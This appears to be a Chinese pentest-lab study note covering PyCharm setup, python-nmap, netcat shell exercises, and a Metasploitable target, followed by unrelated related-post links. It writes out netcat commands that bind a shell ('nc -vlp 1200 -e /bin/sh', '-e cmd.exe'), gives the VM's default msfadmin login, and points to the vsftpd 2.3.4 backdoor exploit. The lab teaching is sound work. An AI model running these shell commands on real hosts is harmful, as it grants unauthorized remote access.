安装pycharm

www.jetbrains.com/pycharm/

tar -zxvf p补全

ls

cd p补全

ls

cd bin

ls

./pycharm.sh

新建项目 pythonRocks.py

print "python Rocks"

cd Desktop

ls

chmod +x pythonRocks.py

ls

python pythonRocks.py

导入Nmap模块

cd Desktop

pip install python-nmap
  • 从网站的方式下载模块
pypi.python.org/pypi

索引 nmap

解压   打开终端

cd python-nmap-0.6.1/

ls

cd python-nmap-0.6.1/

ls

python setup.py install

打开pycharm 新建项目 nmap_Test

improt nmap

nmap1 =nmap.PortScanner()

a = nmap1.nmap_version()

print(a)


ls

python nmap_Test.py

nmap -v

netcat反向shell

ncat

nc --help

nc -help

windows:cd Desktop

nc -vlp 1200

linux:nc - vv windowsIP地址 1200

hello,this it a test message.

windows:hello,it is me.

linux:退出nc

windows:nc -help

nc -vlp 1200 -e cmd.exe

linux:nc - vv windowsIP地址 1200


nc -vlp 1200 -e /bin/sh

ncat -e /bin/sh 1200

sudo bash

apt-get install nmap

ncat -e /bin/sh -vlp 1200

windows:nc -vv linuxIP地址 1200

metasploitable

服务器端攻击,这些IP一般不会变,域名如facebook.com

ping www.facebook.com

下载靶机metasploitable到虚拟机

  • 在靶机中的所有实验和现实情况是一模一样的,请大家一定要遵守法律。

  • 不得打着没有实战的口号,进行正式站点的实战尝试。

    ** 你会发现带有网络web功能的靶机在浏览器里显示内容。

    ** 它是没有安全性功能的靶机,更方便用于原理学习,帮助你更好的验证红队技术。

    ** 正相反,实际站点的安全性非常丰富,防御组件繁多,更不利于学习和掌握核心技术。

    ** 因此,综合所有原因。靶机才是最实际的实战方式,可以测试你所有技术。

  • 例子为parrot发行版

确保靶机网络设置为NAT

不管是服务器渗透还是客户端渗透,先拿到目标IP地址

靶机:ifconfig

parrot:浏览器     输入靶机IP

我们的目标是收集信息,收集靶机中的关于服务器的信息

你可以使用zenmap和nmap在图形化工具与命令行工具中灵活切换

打开zenmap 输入靶机IP地址  选择强烈扫描    下面就会显示生成命令行

会看见打开了很多服务与端口

ssh msfadmin@靶机IP

是否使用RSA密钥选择yes

默认密码 msfadmin

clear    ls    ifconfig    whoami    uname -r    logout

查看zenmap扫描结果信息

谷歌 vsftpd 2.3.4 exploits    得到这个模块是一个获取后门的模块

parrot:msfconsole



再次声明:过分的体现红队信息,真正受益者是用户和蓝队。

如果您不看见,就不会注意版本信息,也就不会重视升级与更新。

随着时间的推移,攻击您的不是初学者,而是更高级别的国际犯罪者。

7.安装pycharm----导入Nmap模块----netcat反向shell----metasploitable靶机环境的更多相关文章

  1. 5.pycharm中导入第三方模块的方法

    最近刚入门学习python,网上查找了一些资料,发现python编程用的软件pycharm还是比较多的,于是就跟随大众,学习使用pycharm,在学习的过程中,想要导入第三方模块pyperclip,但 ...

  2. Python:Pycharm下无法导入安装好的第三方模块?

    Pycharm下无法导入安装好的第三方模块requests? 在cmd下使用pip安装好requests模块后,可以使用import requests,但在Pycharm IDE下无法导入,出现如下错 ...

  3. win10 +python3.6环境下安装opencv以及pycharm导入cv2有问题的解决办法

    一.安装opencv 借鉴的这篇博客已经写得很清楚了--------https://blog.csdn.net/u011321546/article/details/79499598       ,这 ...

  4. PyCharm中导入MySQLDB模块小结

    安装完MySQL-python驱动,在PyCharm中导入MySQLDB模块一直不成功 Settings里面也没有MySQLdb 百般尝试找解决办法,一直搞不定,最后抱着试一试的心态尝试了一个办法: ...

  5. pycharm导入自己写的包的时候,不能识别模块的解决办法

    今天用写selenium脚本的时候导入自己统计目录下的模块时,出错,明明存在但是报错说模块不存在,找了半天终于找到解决方案,顺便记录一下吧 pycharm不会将当前文件目录自动加入自己的sourse_ ...

  6. 解决pycharm不能导入bs4模块问题

    问题描述: 在导入bs4模块时有报错提示 “ Traceback (most recent call last): File "E:/project/code/py-pengfu/py-pf ...

  7. PyCharm导入模块报No model named

    PyCharm导入模块报No model named 引言 在PyCharm中同目录下import其他模块,出现No model named ...的报错,但实际可以运行的情况. 这很可能是因为PyC ...

  8. 在Pycharm中导入第三方模块库(诸如:matplotlib、numpy等)

    在Pycharm中导入第三方模块库 一.打开pycharm: 二.点击菜单上的“file” -> “setting”: 三.步骤二完成后出现界面如下所示.选中你的项目(比如thisyan Pro ...

  9. pycharm IDE在导入自定义模块时提示有错,但实际没错

    在建立python项目时,有时为了区分资源和代码,如在项目文件夹下新建img和src两个文件夹,这时导入自定义模块会提示错误,结果没错但感觉别扭.如: 这是因为pycharm提示功能是从根目录上去寻找 ...

随机推荐

  1. centos7 远程桌面连接到xfce桌面

    1 安装xfce $ sudo yum install -y epel-release $ sudo yum groupinstall -y "Xfce" $ sudo reboo ...

  2. c++ primer 5th(中文版)勘误

    \(P_{158}\) "末位大于 3" 改为 "末位大于等于 3" \(P_{302}\) \(P_{319}\) // 添加元素用光多余容量 while ( ...

  3. STM32Cube IDE配置串口发送与接收

    此项目源码下载地址:https://github.com/lizhiqiang0204/STM32CubeIDE_Uart 串口与中断配置如下 在生成的main函数中,添加开启串口接收中断 HAL_I ...

  4. Vue项目的痛点

    前言 用Vue做项目,难免会有痛点,移动端还是PC端,我也总结了下关于问题: 进入详情页的传参问题. 服务器接口跨域 axios封装请求 UI库的按需加载 如何只在当前页面中覆盖ui库中组件的样式 定 ...

  5. NOIP2016提高A组模拟中秋节9.15总结

    这套题不算难但是比赛上萎掉了. 第一题数论, 当找到一个合适的数就直接处理答案,再用筛法将处理过的删掉. 比赛上没想到筛法,只拿了70分. 第二题二分答案,然后验证合法性就可以. 但是由于不能二分小数 ...

  6. nodejs中 require 方法的加载规则

    require参数类型 http.fs.path等,原生模块 ./mod或../mod,相对路径的文件模块 /pathtomodule/mod,绝对路径的文件模块 mod,非原生模块的文件模块 在进 ...

  7. 对vue的solt的理解

    //父 <children> <span>12345</span>//这边不会显示 </children> //子 components: { chil ...

  8. GET和POST请求的区别和使用场景

    本质上的区别: GET请求.处理.响应过程中只是产生一个TCP数据包,而POST请求会产生两个TCP数据包.    更具体地说,GET请求过程中头和请求正文数据一起到服务器端, 而POST请求过程中, ...

  9. C# WPF开机自启动和只允许一个程序运行

    本文出自:https://www.cnblogs.com/2186009311CFF/p/10024949.html 在App.xaml.cs填充一下内容,即可实现只允许一个运行,且不解锁屏幕的情况下 ...

  10. bing 精美壁纸获取方式

    右键检查 打开就行了